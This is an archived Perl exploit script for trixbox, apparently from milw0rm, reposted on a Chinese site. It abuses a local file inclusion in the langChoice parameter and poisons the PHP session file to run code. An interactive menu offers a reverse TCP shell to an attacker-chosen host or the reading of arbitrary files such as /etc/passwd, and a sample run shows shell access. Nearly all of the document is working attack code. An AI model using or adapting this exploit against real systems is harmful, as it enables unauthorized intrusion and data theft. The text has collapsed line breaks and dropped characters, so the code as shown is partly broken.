#!/usr/bin/perl -w# Jean-Michel BESNARD - LEXSI Audit# 2008-07-08# perl trixbox_fi.pl 192.168.1.212# Please listen carefully as our menu option has changed# Choose from the following options:#     1> Remote TCP shell#     2> Read local file# 1# Host and port the reverse shell should connect to ? (<host>:<port>): 192.168.1.132:4444# Make sure you've opened a server socket on port 4444 at 192.168.1.132 (e.g, nc -l -p 4444)# Press enter to continue...# done...# nc -l -v -p 4444# listening on [any] 4444 ...# connect to [192.168.1.132] from [192.168.1.212] 46532# JMB: no job control in this shell# JMB: /root/.bashrc: Permission denied# JMB-3.1$ id# uid=102(asterisk) gid=103(asterisk) groups=103(asterisk)use strict;use Switch;use LWP::UserAgent;use HTTP::Cookies;usage() unless @ARGV;my $url = "http://$ARGV[0]/user/index.php";my $ua = LWP::UserAgent->new;my $cookie_jar = HTTP::Cookies->new;$ua->cookie_jar($cookie_jar);menu();sub execScript{    my $scriptCode = shift;    post($scriptCode);    my $phpsessionid = extractPHPSID($cookie_jar->as_string);    post("langChoice=../../../../../tmp/sess_$phpsessionid");}sub post{    my $postData = shift;    my $req = HTTP::Request->new(POST => $url);    $req->content_type('application/x-www-form-urlencoded');    $req->content($postData);    my $res = $ua->request($req);    my $content = $res->content;    return $content;}sub readFile{    my $file = shift;    my $content = post("langChoice=../../../../..$file");    my @fileLines = split(/\n/,$content);    my $fileContent = "Content of $file: \n\n";    for(my $i=3;$i<@fileLines;$i  ){    last if($fileLines[$i] =~ m/trixbox - User Mode/);    $fileContent = $fileContent . $fileLines[$i-3] . "\n";    }    return $fileContent;}sub tcp_reverse_shell{    my $rhost= shift;    my $rport = shift;    my $rshell = "langChoice=<?php `/usr/bin/perl -MSocket -e '\\\$p=fork;exit,if(\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\"$rhost\")));open(STDIN, \">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec({\"/bin/sh\"} (\"JMB\", \"-i\"));'`;?>";    execScript($rshell);}sub extractPHPSID{    $_ = shift;    if(/PHPSESSID=(\w )/){    return $1;    }}sub menu{    print <<EOFlease listen carefully as our menu option has changedChoose from the following options:    1> Remote TCP shell    2> Read local fileEOF    my $option = <STDIN>;    chop($option);    switch($option){    case 1 {        print "Host and port the reverse shell should connect to ? ";        print "(<host>:<port>): ";        my $hp=<STDIN>;        chop($hp);        my($rhost,$rport) = split(/:/,$hp);        print "Make sure you've opened a server socket on port $rport at $rhost (e.g, nc -l -p $rport)\n";        print "ress enter to continue...";        <STDIN>;        tcp_reverse_shell($rhost,$rport);        print "done...\n";        }    case 2 {        while(1){        print "Full path (e.g. /etc/passwd): ";        my $file = <STDIN>;        chop($file);        print readFile($file) . "\n\n";        }    }    }}sub usage{    print "./trixbox_fi.pl <host>\n";    exit 1;}# milw0rm.com [2008-07-08][/code]

来源：https://www.jb51.net/hack/5653.html
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！